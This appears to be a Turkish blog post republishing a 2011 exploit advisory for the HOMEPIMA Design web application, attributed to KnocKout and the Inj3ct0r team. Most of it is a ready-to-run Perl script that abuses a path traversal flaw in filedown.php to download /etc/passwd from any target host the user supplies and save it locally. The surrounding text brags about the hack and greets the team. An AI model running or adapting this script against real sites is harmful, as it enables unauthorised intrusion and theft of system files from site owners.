6 Mayıs 2011 Cuma

HOMEPIMA Design <= Remote Information Disclosure Exploit

~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : HOMEPIMA Design
|~Price : N/A
|~Version : N/A
|~Vulnerability Style : /etc/passwd Disclosure
|~Vulnerability Dir : /
|~Google Keyword : N/A
|[~]Date : "06.05.2011"
|[~]Tested on :
DEMOS
----------------------------------------------------------
filedown.php <= 'file' Functions Not Security
 
MANUAL DÝSCLOSUYRE ATTACKÝNG START.
---------------------------------------------------------
 
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
              /etc/passwd Disclosure Exploit.
    =============== DISCLOSURE.PL =================================================
 
use LWP::Simple;
use LWP::UserAgent;
system('cls');
system('title HOMEPIMA Design <= Remote Information Disclosure Exploit');
system('color 2');
if(@ARGV < 2)
{
print "[-]Su Sekilde Kocum. \n\n";
&help; exit();
}
sub help()
{
print "[+] usage1 : perl $0 HedefWeb /path/ \n";
print "[+] usage2 : perl $0 localhost / \n";
}
print "\n************************************************************************\n";
print "\* Plinka Design <= Remote (File Disclosure/LFI) Exploit              *\n";
print "\* Exploited By : KnocKout                                                  *\n";
print "\* Contact :   knockoutr[at]msn[dot]com                                 *\n";
print "\* --                                    *\n";
print "\*********************************************************************\n\n\n";
($TargetIP, $path, $File,) = @ARGV;
$File="setup/filedown.php?file=../../../../../../../../../../../../../../etc/passwd";
my $url = "http://" . $TargetIP . $path . $File;
print "\n Az Bekle Sikertiyorum!!! \n\n";
my $useragent = LWP::UserAgent->new();
my $request = $useragent->get($url,":content_file" => "passwd.txt");
if ($request->is_success)
{
print "[+] $url <= Hedef Site Exploit Edildi!\n\n";
print "[+] OPERASYON TAMAM !\n";
print "[+] etc/passwd Dosyasi Indirildi (passwd.txt)\n";
print "[+] GRAYHATZ STAR \n";
print "[+] Special tnX # + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com)
# Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * agix * KedAns-Dz
# gunslinger_ * Sn!pEr.S!Te * ZoRLu * anT!-Tr0J4n 'www.1337day.com/team' ++ ....
 \n";
exit();
}
else
{
print "[!] Exploit $url Basarisiz !\n[!] ".$request->status_line."\n";
exit();
}
 
 
    ================================================================
 
 
http://tr.1337day.com/exploit/16054

Hiç yorum yok:

Yorum Gönder